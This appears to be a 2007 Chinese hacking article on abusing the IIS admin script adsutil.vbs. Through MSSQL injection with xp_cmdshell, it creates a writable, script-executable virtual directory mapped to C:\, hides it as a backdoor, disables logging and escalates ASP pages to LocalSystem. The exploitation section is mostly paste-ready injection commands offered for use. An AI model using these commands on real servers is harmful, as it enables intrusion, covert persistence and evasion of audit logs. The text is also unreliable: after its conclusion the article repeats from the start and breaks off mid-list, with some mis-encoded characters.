Adsutil.vbs 在腳本攻擊中的妙用[我非我原創(chuàng)]
更新時(shí)間:2007年03月17日 00:00:00 作者:
一、簡單介紹
adsutil.vbs是什么?相信用過IIS的網(wǎng)管員不會不知道。這是IIS自帶的提供于命令行下管理IIS的一個(gè)腳本。位于%SystemDrive%\Inetpub\AdminScripts目錄下。足足有95,426 字節(jié)大小。這么大的腳本一看就知道功能強(qiáng)大。事實(shí)也的確如此?;旧衔业母杏X它就是個(gè)命令行下的“Internet 信息服務(wù)管理器”。(事實(shí)上2000的服務(wù)器上%SystemDrive%\Inetpub\AdminScripts下原有20多個(gè)vbs文件以供管理。而到了2003則只剩下adsutil.vbs一個(gè)了。足以說明它的功能是多么復(fù)雜)
提到adsutil.vbs就不得不提到MetaBase.bin。這個(gè)文件是IIS最重要的配置文件。所有對IIS的設(shè)置最終都會儲存在這個(gè)文件中。IIS管理器和adsutil.vbs就是通過對這個(gè)文件讀取配置信息來顯示給用戶的。MetaBase.bin的儲存結(jié)構(gòu)十分像注冊表,是一種樹型儲存結(jié)構(gòu)。IIS管理器和adsutil.vbs通過一個(gè)Adspath的路徑來訪問MetaBase.bin。路徑是由IIS:\開頭,其中LocalHost表示本地服務(wù)器,而w3svc表示IIS服務(wù)。如IIS:\LocalHost/w3svc/1表示本地服務(wù)器上的第一個(gè)web站點(diǎn)。IIS:\LocalHost/w3svc/1/root/Vdir表示第一個(gè)web站點(diǎn)根目錄下的Vdir虛擬目錄。
有了這些前置知識,下面再回到adsutil.vbs來看看它的用法吧:
C:\Inetpub\AdminScripts>cscript adsutil.vbs //別忘了鍵入cscript.exe這個(gè)腳本宿主文件名哦
Microsoft (R) Windows Script Host Version 5.6
版權(quán)所有(C) Microsoft Corporation 1996-2001。保留所有權(quán)利。
Usage:
ADSUTIL.VBS <cmd> [<path> [<value>]]
Description:
IIS administration utility that enables the configuration of metabase properties
.
Supported Commands: //支持的命令。這個(gè)最重要
GET, SET, ENUM, DELETE, CREATE, COPY,
APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP
PGETSTATUS
Samples: //簡單的幾個(gè)例子
adsutil.vbs GET W3SVC/1/ServerBindings //查看第一個(gè)虛擬web站點(diǎn)的邦定端口。這里的W3SVC/1是IIS:\ LocalHostW3SVC/1的簡寫,而ServerBindings是他的屬性。下同。
adsutil.vbs SET W3SVC/1/ServerBindings ":81:" //設(shè)定第一個(gè)虛擬web站點(diǎn)的邦定端口為81。
adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir" //在第一個(gè)虛擬web站點(diǎn)根目錄下建立一個(gè)MyVdir的虛擬目錄。后面的"IIsWebVirtualDir"指的是目錄類型。
adsutil.vbs START_SERVER W3SVC/1 //啟動(dòng)第一個(gè)虛擬web站點(diǎn)。
adsutil.vbs ENUM /P W3SVC //查看IIS的所有站點(diǎn)。
For Extended Help type:
adsutil.vbs HELP //如果想要進(jìn)一步的查看幫助,鍵入此命令。我這里就不轉(zhuǎn)了。防止有人說我賺稿費(fèi)。大家可以自己看看。
以上“//”后的文字都是我添加上去的注釋(下同)。相信這樣應(yīng)該可以看懂了吧大家。
我們所常用的adsutil.vbs的命令有這么幾個(gè):GET, SET, ENUM, DELETE, CREATE?,F(xiàn)在我來一一說明:
GET命令通常是用來查看目錄的各項(xiàng)屬性值的。SET是用來設(shè)定目錄屬性用的。ENUM也是用來查看屬性。所不同的是他直接把所有設(shè)置了的屬性直接全部顯示出來。通常一個(gè)目錄就有好幾頁東西可看……他有個(gè)可選的“/p”開關(guān)符。加上了此開關(guān)的話。他只會列出此目錄下的所有虛擬目錄。DELETE命令是用來刪除虛擬目錄的。CREATE則是創(chuàng)建一個(gè)虛擬目錄。另外還有幾個(gè)命令:START_SERVER、STOP_SERVER、PAUSE_SERVER、CONTINUE _SERVER。分別是啟動(dòng)、停止、暫停、繼續(xù)虛擬站點(diǎn)的運(yùn)行。
一個(gè)虛擬目錄的大致屬性值如下(我只列出了可能我們所常用的,否則會太長了):
KeyType : (STRING) "IIsWebVirtualDir" //目錄類型,(STRING)說明它是個(gè)字符串類型的屬性
AppRoot : (STRING) "/LM/W3SVC/1/ROOT" //目錄IIS路徑
AppFriendlyName : (STRING) "默認(rèn)應(yīng)用程序" //應(yīng)用程序名
AppIsolated : (INTEGER) 2 //指定運(yùn)行于進(jìn)程外還是進(jìn)程中,數(shù)字類型屬性。
HttpCustomHeaders : (LIST) (1 Items) //自定義IIS數(shù)據(jù)頭
"Powered By : www.WoFeiWo.Info"
HttpErrors : (LIST) (42 Items) //各種IIS代碼所返回的頁面??梢宰孕性O(shè)置。我這里將會顯省略了。
DefaultDoc : (STRING) "Default.htm,index.htm,Default.asp,in
dex.asp,Default.php,index.php,Default.aspx,index.aspx" //目錄的默認(rèn)主頁面名稱。
Path : (STRING) "D:\ftp" //目錄所真正映射的物理路徑
AccessFlags : (INTEGER) 513 //我也不知道這是啥。反正沒設(shè)置過。好像會自動(dòng)設(shè)置的
AccessExecute : (BOOLEAN) False //目錄的執(zhí)行權(quán)限,是布爾值
AccessSource : (BOOLEAN) False //目錄的Webdav訪問是否允許
AccessRead : (BOOLEAN) True //目錄的只讀權(quán)限
AccessWrite : (BOOLEAN) False //目錄的寫權(quán)限
AccessScript : (BOOLEAN) True //目錄是否允許執(zhí)行腳本
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
AccessNoPhysicalDir : (BOOLEAN) False
ScriptMaps : (LIST) (27 Items) //應(yīng)用程序擴(kuò)展名映射
".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEA
D,POST,DEBUG"
……………… //這里省略了n多數(shù)據(jù)
AspEnableParentPaths : (BOOLEAN) True
AppPoolId : (STRING) "DefaultAppPool" //應(yīng)用程序池名稱
DontLog : (BOOLEAN) True //禁止IISLog紀(jì)錄
DirBrowseFlags : (INTEGER) -1073741762
EnableDirBrowsing : (BOOLEAN) True //目錄是否允許列目錄
DirBrowseShowDate : (BOOLEAN) True //這里及以下都是顯示目錄時(shí)的參數(shù)設(shè)置。英文都很簡單。我也就不多說了。
DirBrowseShowTime : (BOOLEAN) True
DirBrowseShowSize : (BOOLEAN) True
DirBrowseShowExtension : (BOOLEAN) True
DirBrowseShowLongDate : (BOOLEAN) True
EnableDefaultDoc : (BOOLEAN) True //是否開啟默認(rèn)主頁文檔
以上是我用cscript adsutil.vbs ENUM w3svc/1/root命令在自己機(jī)器上察看到的。大家也可以自己輸入以上命令研究。
上面的屬性我們都可以來通過SET命令來進(jìn)行設(shè)置。如下方式:
cscript adsutil.vbs SET w3svc/1/root/目錄名/屬性名 設(shè)置值
如:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1 //設(shè)置第一個(gè)虛擬web站點(diǎn)下的wofeiwo虛擬目錄的可讀權(quán)限為Ture
或:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\” //設(shè)置目錄的映射路徑是“C:\”
下面來看看我們的簡單利用的例子
二、adsutil.vbs的利用
(一)MSSQL Injection的上傳新思路
或許大家會在MSSQL的注入中碰到這種情況:SA權(quán)限。可以執(zhí)行Cmd命令(xp_cmdshell、sp_OACreate、Job等等)。可是服務(wù)器是在內(nèi)網(wǎng)。外面是個(gè)堡壘主機(jī)。只是做了個(gè)80端口的映射。3389開了沒有用(內(nèi)網(wǎng)連不上?。蟹聪蚰抉R也傳不上去(Tftp、Ftp、Wget、exe2bat等等)這時(shí)候你該怎么辦?
Amanl大哥經(jīng)典的《榨干MSSQL最后一滴血》給我們一個(gè)很好的思路:就是利用%SystemDrive%\Inetpub\AdminScripts下的vbs建立一個(gè)新的虛擬目錄。自定義其映射的絕對路徑。這樣可以繞過了對web絕對路徑的猜解。然后通過BACKUP或MASKWEBTASK備份數(shù)據(jù)庫或臨時(shí)表到虛擬目錄下(或是直接echo)就可以得到了一個(gè)shell。
上面的想法的確很好??墒怯眠^臭要飯的GetWebShell或小竹的NBUpFile的人都知道BACKUP或MASKWEBTASK的成功率有多么的低……而echo……我也不想說了。一行一行寫那簡直是找罪受。(還要不停的轉(zhuǎn)特殊字符……)
其實(shí)我們可以把Amanl大哥的想法改進(jìn)一下。在我們建立一個(gè)新的虛擬目錄的時(shí)候??梢约由蠈懩夸浀臋?quán)限。再加上Webdav……那么我們不久可以直接通過IIS上傳任何文件了嗎?也不僅僅局限于文本文件了。如果我們上傳了個(gè)反向后門在通過SA執(zhí)行……呵呵,一切就都搞定了!
來,馬上實(shí)行:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\”';--
注意上面的特殊字符要自己轉(zhuǎn)變?;蛘吣憧梢杂肗BSI2或者小路的SQLCOMM來執(zhí)行以上命令。
這樣我們就在第一個(gè)web站點(diǎn)下建立了一個(gè)wofeiwo的虛擬目錄,映射到了C:根目錄。我再給他加上讀和寫的權(quán)限,為了要一個(gè)webshell ,我再加上執(zhí)行腳本的權(quán)限:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessRead 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessScript 1';--
寫到這看過Surperhei《對IIS寫權(quán)限的利用》的朋友可能會想要自己構(gòu)造http包來上傳文件。其實(shí)有更簡單的方法:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessSource 1';--
設(shè)置為允許列目錄和webdav訪問,然后打開你的IE,Ctrl+O打開“打開”對話框,鍵入你剛才設(shè)置的虛擬目錄。選中“以Web文件夾方式打開”,確定。如圖:
圖一
啊哈!看到所有的文件夾了嗎?如圖所示:
圖二
現(xiàn)在你就可以像操作普通文件夾一樣操作以上文件了。還可以Ctrl+C、Ctrl+V復(fù)制文件呢。實(shí)現(xiàn)了方便上傳、修改文件的功能。
(二)更進(jìn)一步
其實(shí)我們完全可以更進(jìn)一步利用上面所說的思路直接制作一個(gè)IIS后門。來,看我的實(shí)現(xiàn)?。ㄟ@里使用了動(dòng)鯊在《近乎完美的IIS后門》中所介紹的方法。不過我是直接用adsutil.vbs這個(gè)MS自帶的工具完成了設(shè)置。對此文章感興趣的朋友可以自己找來看看。)
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';-- //首先建立一個(gè)wofeiwo目錄。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir"';-- //在wofeiwo目錄下又建立了一個(gè)door目錄。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/door/Path “C:\”';-- //設(shè)置door目錄映射到C:根目錄。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1';-- //這里及以下都是給目錄設(shè)置個(gè)種權(quán)限??梢詤⒖家陨系拿钭⑨?。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1';--
可能會有人說,什么阿。不就是和上面的一樣嗎?呵呵。其實(shí)你仔細(xì)看。會發(fā)現(xiàn)我們上面新建的第一個(gè)目錄“wofeiwo”并沒有設(shè)置“Path”屬性。也就是說他沒有映射到任何實(shí)際的目錄上去。這里應(yīng)用了IIS的一個(gè)漏洞(涉及到IIS5.0.1.0)。即對于沒有“Path”屬性的虛擬目錄是不會在IIS管理器中出現(xiàn)的。相當(dāng)于一個(gè)隱藏的目錄。而其下的虛擬目錄“door”同樣是由于上級目錄不可見的,所以它也是不可見的!但是“door”目錄是設(shè)置了“Path”屬性的。所以如果我們提交http://IP/wofeiwo/door/ 路徑。其結(jié)果是會返回C:下的文件目錄?,F(xiàn)在此目錄已經(jīng)是我們可以任意寫文件讀文件了。并且還可以轉(zhuǎn)到System32目錄下對程序進(jìn)行運(yùn)行。我們的后門雛形建成了。(注意看我這里是加上了AccessExecute執(zhí)行權(quán)限的)
但是我們現(xiàn)在執(zhí)行的程序都還是IIS默認(rèn)的IUSR用戶的Guest權(quán)限。沒有大的權(quán)限我們總是不爽。下面來提升我們的權(quán)限,加IUSR用戶為管理員就不說了。下面說說另兩個(gè)方法:
1、設(shè)置AppIsolated,使此目錄下程序在IIS的進(jìn)程中進(jìn)行。這樣就繼承了IIS的System權(quán)限。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/ AppIsolated 0';--
2、 將解析asp文件的asp.dll加入到IIS的特權(quán)dll中。使得其在進(jìn)程中運(yùn)行。從而的到IIS的LocalSystem權(quán)限。
1)首先得到IIS所有的特權(quán)dll
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs GET w3svc/InProcessIsapiApps';--
返回:
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINDOWS\system32\inetsrv\httpext.dll"
"C:\WINDOWS\system32\inetsrv\httpodbc.dll"
"C:\WINDOWS\system32\inetsrv\ssinc.dll"
"C:\WINDOWS\system32\msw3prt.dll"
"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll"
2) 將asp.dll設(shè)置到InProcessIsapiApps組中去,這里要注意,把上面的所有查到的dll都加上,否則會被刪除。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/InProcessIsapiApps "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"';--
返回:
InProcessIsapiApps : (LIST) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"
這樣就設(shè)置好了。以后無論什么asp文件就都是 LoaclSystem權(quán)限了。通過以上的步驟。我們的IIS后門基本上就是設(shè)置好了。你可以上傳asp木馬加以輔助控制。這樣的設(shè)置型后門是很難被管理員發(fā)現(xiàn)的。并且完全通過IIS的80端口通訊。又沒有日志記錄。所以相當(dāng)安全。
三、結(jié)言
到這里我關(guān)于adsutil.vbs的一點(diǎn)簡單應(yīng)用就結(jié)束了。突然發(fā)現(xiàn)文章已經(jīng)寫了那么多了。哇啊啊……文章寫得好累阿。由于本人是一菜鳥。文章難免有疏漏。還請大家多多指教。有什么疑問請和我聯(lián)系。我的郵箱:wofeiwo@bugkidz.org?;蛘叽蠹铱梢缘交鸷夹g(shù)聯(lián)盟http://www.wrsky.com來找我。我的ID:我非我。是論壇新手版的版主。
adsutil.vbs是什么?相信用過IIS的網(wǎng)管員不會不知道。這是IIS自帶的提供于命令行下管理IIS的一個(gè)腳本。位于%SystemDrive%\Inetpub\AdminScripts目錄下。足足有95,426 字節(jié)大小。這么大的腳本一看就知道功能強(qiáng)大。事實(shí)也的確如此?;旧衔业母杏X它就是個(gè)命令行下的“Internet 信息服務(wù)管理器”。(事實(shí)上2000的服務(wù)器上%SystemDrive%\Inetpub\AdminScripts下原有20多個(gè)vbs文件以供管理。而到了2003則只剩下adsutil.vbs一個(gè)了。足以說明它的功能是多么復(fù)雜)
提到adsutil.vbs就不得不提到MetaBase.bin。這個(gè)文件是IIS最重要的配置文件。所有對IIS的設(shè)置最終都會儲存在這個(gè)文件中。IIS管理器和adsutil.vbs就是通過對這個(gè)文件讀取配置信息來顯示給用戶的。MetaBase.bin的儲存結(jié)構(gòu)十分像注冊表,是一種樹型儲存結(jié)構(gòu)。IIS管理器和adsutil.vbs通過一個(gè)Adspath的路徑來訪問MetaBase.bin。路徑是由IIS:\開頭,其中LocalHost表示本地服務(wù)器,而w3svc表示IIS服務(wù)。如IIS:\LocalHost/w3svc/1表示本地服務(wù)器上的第一個(gè)web站點(diǎn)。IIS:\LocalHost/w3svc/1/root/Vdir表示第一個(gè)web站點(diǎn)根目錄下的Vdir虛擬目錄。
有了這些前置知識,下面再回到adsutil.vbs來看看它的用法吧:
C:\Inetpub\AdminScripts>cscript adsutil.vbs //別忘了鍵入cscript.exe這個(gè)腳本宿主文件名哦
Microsoft (R) Windows Script Host Version 5.6
版權(quán)所有(C) Microsoft Corporation 1996-2001。保留所有權(quán)利。
Usage:
ADSUTIL.VBS <cmd> [<path> [<value>]]
Description:
IIS administration utility that enables the configuration of metabase properties
.
Supported Commands: //支持的命令。這個(gè)最重要
GET, SET, ENUM, DELETE, CREATE, COPY,
APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, AP
PGETSTATUS
Samples: //簡單的幾個(gè)例子
adsutil.vbs GET W3SVC/1/ServerBindings //查看第一個(gè)虛擬web站點(diǎn)的邦定端口。這里的W3SVC/1是IIS:\ LocalHostW3SVC/1的簡寫,而ServerBindings是他的屬性。下同。
adsutil.vbs SET W3SVC/1/ServerBindings ":81:" //設(shè)定第一個(gè)虛擬web站點(diǎn)的邦定端口為81。
adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir" //在第一個(gè)虛擬web站點(diǎn)根目錄下建立一個(gè)MyVdir的虛擬目錄。后面的"IIsWebVirtualDir"指的是目錄類型。
adsutil.vbs START_SERVER W3SVC/1 //啟動(dòng)第一個(gè)虛擬web站點(diǎn)。
adsutil.vbs ENUM /P W3SVC //查看IIS的所有站點(diǎn)。
For Extended Help type:
adsutil.vbs HELP //如果想要進(jìn)一步的查看幫助,鍵入此命令。我這里就不轉(zhuǎn)了。防止有人說我賺稿費(fèi)。大家可以自己看看。
以上“//”后的文字都是我添加上去的注釋(下同)。相信這樣應(yīng)該可以看懂了吧大家。
我們所常用的adsutil.vbs的命令有這么幾個(gè):GET, SET, ENUM, DELETE, CREATE?,F(xiàn)在我來一一說明:
GET命令通常是用來查看目錄的各項(xiàng)屬性值的。SET是用來設(shè)定目錄屬性用的。ENUM也是用來查看屬性。所不同的是他直接把所有設(shè)置了的屬性直接全部顯示出來。通常一個(gè)目錄就有好幾頁東西可看……他有個(gè)可選的“/p”開關(guān)符。加上了此開關(guān)的話。他只會列出此目錄下的所有虛擬目錄。DELETE命令是用來刪除虛擬目錄的。CREATE則是創(chuàng)建一個(gè)虛擬目錄。另外還有幾個(gè)命令:START_SERVER、STOP_SERVER、PAUSE_SERVER、CONTINUE _SERVER。分別是啟動(dòng)、停止、暫停、繼續(xù)虛擬站點(diǎn)的運(yùn)行。
一個(gè)虛擬目錄的大致屬性值如下(我只列出了可能我們所常用的,否則會太長了):
KeyType : (STRING) "IIsWebVirtualDir" //目錄類型,(STRING)說明它是個(gè)字符串類型的屬性
AppRoot : (STRING) "/LM/W3SVC/1/ROOT" //目錄IIS路徑
AppFriendlyName : (STRING) "默認(rèn)應(yīng)用程序" //應(yīng)用程序名
AppIsolated : (INTEGER) 2 //指定運(yùn)行于進(jìn)程外還是進(jìn)程中,數(shù)字類型屬性。
HttpCustomHeaders : (LIST) (1 Items) //自定義IIS數(shù)據(jù)頭
"Powered By : www.WoFeiWo.Info"
HttpErrors : (LIST) (42 Items) //各種IIS代碼所返回的頁面??梢宰孕性O(shè)置。我這里將會顯省略了。
DefaultDoc : (STRING) "Default.htm,index.htm,Default.asp,in
dex.asp,Default.php,index.php,Default.aspx,index.aspx" //目錄的默認(rèn)主頁面名稱。
Path : (STRING) "D:\ftp" //目錄所真正映射的物理路徑
AccessFlags : (INTEGER) 513 //我也不知道這是啥。反正沒設(shè)置過。好像會自動(dòng)設(shè)置的
AccessExecute : (BOOLEAN) False //目錄的執(zhí)行權(quán)限,是布爾值
AccessSource : (BOOLEAN) False //目錄的Webdav訪問是否允許
AccessRead : (BOOLEAN) True //目錄的只讀權(quán)限
AccessWrite : (BOOLEAN) False //目錄的寫權(quán)限
AccessScript : (BOOLEAN) True //目錄是否允許執(zhí)行腳本
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
AccessNoPhysicalDir : (BOOLEAN) False
ScriptMaps : (LIST) (27 Items) //應(yīng)用程序擴(kuò)展名映射
".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEA
D,POST,DEBUG"
……………… //這里省略了n多數(shù)據(jù)
AspEnableParentPaths : (BOOLEAN) True
AppPoolId : (STRING) "DefaultAppPool" //應(yīng)用程序池名稱
DontLog : (BOOLEAN) True //禁止IISLog紀(jì)錄
DirBrowseFlags : (INTEGER) -1073741762
EnableDirBrowsing : (BOOLEAN) True //目錄是否允許列目錄
DirBrowseShowDate : (BOOLEAN) True //這里及以下都是顯示目錄時(shí)的參數(shù)設(shè)置。英文都很簡單。我也就不多說了。
DirBrowseShowTime : (BOOLEAN) True
DirBrowseShowSize : (BOOLEAN) True
DirBrowseShowExtension : (BOOLEAN) True
DirBrowseShowLongDate : (BOOLEAN) True
EnableDefaultDoc : (BOOLEAN) True //是否開啟默認(rèn)主頁文檔
以上是我用cscript adsutil.vbs ENUM w3svc/1/root命令在自己機(jī)器上察看到的。大家也可以自己輸入以上命令研究。
上面的屬性我們都可以來通過SET命令來進(jìn)行設(shè)置。如下方式:
cscript adsutil.vbs SET w3svc/1/root/目錄名/屬性名 設(shè)置值
如:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1 //設(shè)置第一個(gè)虛擬web站點(diǎn)下的wofeiwo虛擬目錄的可讀權(quán)限為Ture
或:cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\” //設(shè)置目錄的映射路徑是“C:\”
下面來看看我們的簡單利用的例子
二、adsutil.vbs的利用
(一)MSSQL Injection的上傳新思路
或許大家會在MSSQL的注入中碰到這種情況:SA權(quán)限。可以執(zhí)行Cmd命令(xp_cmdshell、sp_OACreate、Job等等)。可是服務(wù)器是在內(nèi)網(wǎng)。外面是個(gè)堡壘主機(jī)。只是做了個(gè)80端口的映射。3389開了沒有用(內(nèi)網(wǎng)連不上?。蟹聪蚰抉R也傳不上去(Tftp、Ftp、Wget、exe2bat等等)這時(shí)候你該怎么辦?
Amanl大哥經(jīng)典的《榨干MSSQL最后一滴血》給我們一個(gè)很好的思路:就是利用%SystemDrive%\Inetpub\AdminScripts下的vbs建立一個(gè)新的虛擬目錄。自定義其映射的絕對路徑。這樣可以繞過了對web絕對路徑的猜解。然后通過BACKUP或MASKWEBTASK備份數(shù)據(jù)庫或臨時(shí)表到虛擬目錄下(或是直接echo)就可以得到了一個(gè)shell。
上面的想法的確很好??墒怯眠^臭要飯的GetWebShell或小竹的NBUpFile的人都知道BACKUP或MASKWEBTASK的成功率有多么的低……而echo……我也不想說了。一行一行寫那簡直是找罪受。(還要不停的轉(zhuǎn)特殊字符……)
其實(shí)我們可以把Amanl大哥的想法改進(jìn)一下。在我們建立一個(gè)新的虛擬目錄的時(shí)候??梢约由蠈懩夸浀臋?quán)限。再加上Webdav……那么我們不久可以直接通過IIS上傳任何文件了嗎?也不僅僅局限于文本文件了。如果我們上傳了個(gè)反向后門在通過SA執(zhí)行……呵呵,一切就都搞定了!
來,馬上實(shí)行:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path “C:\”';--
注意上面的特殊字符要自己轉(zhuǎn)變?;蛘吣憧梢杂肗BSI2或者小路的SQLCOMM來執(zhí)行以上命令。
這樣我們就在第一個(gè)web站點(diǎn)下建立了一個(gè)wofeiwo的虛擬目錄,映射到了C:根目錄。我再給他加上讀和寫的權(quán)限,為了要一個(gè)webshell ,我再加上執(zhí)行腳本的權(quán)限:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessRead 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessScript 1';--
寫到這看過Surperhei《對IIS寫權(quán)限的利用》的朋友可能會想要自己構(gòu)造http包來上傳文件。其實(shí)有更簡單的方法:
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1';--
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessSource 1';--
設(shè)置為允許列目錄和webdav訪問,然后打開你的IE,Ctrl+O打開“打開”對話框,鍵入你剛才設(shè)置的虛擬目錄。選中“以Web文件夾方式打開”,確定。如圖:
圖一
啊哈!看到所有的文件夾了嗎?如圖所示:
圖二
現(xiàn)在你就可以像操作普通文件夾一樣操作以上文件了。還可以Ctrl+C、Ctrl+V復(fù)制文件呢。實(shí)現(xiàn)了方便上傳、修改文件的功能。
(二)更進(jìn)一步
其實(shí)我們完全可以更進(jìn)一步利用上面所說的思路直接制作一個(gè)IIS后門。來,看我的實(shí)現(xiàn)?。ㄟ@里使用了動(dòng)鯊在《近乎完美的IIS后門》中所介紹的方法。不過我是直接用adsutil.vbs這個(gè)MS自帶的工具完成了設(shè)置。對此文章感興趣的朋友可以自己找來看看。)
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';-- //首先建立一個(gè)wofeiwo目錄。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir"';-- //在wofeiwo目錄下又建立了一個(gè)door目錄。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs cscript adsutil.vbs SET w3svc/1/root/wofeiwo/door/Path “C:\”';-- //設(shè)置door目錄映射到C:根目錄。
Exec Master..Xp_CmdShell ‘Cscript.exe %SystemDrive%\Inetpub\AdminScripts\ adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1';-- //這里及以下都是給目錄設(shè)置個(gè)種權(quán)限??梢詤⒖家陨系拿钭⑨?。
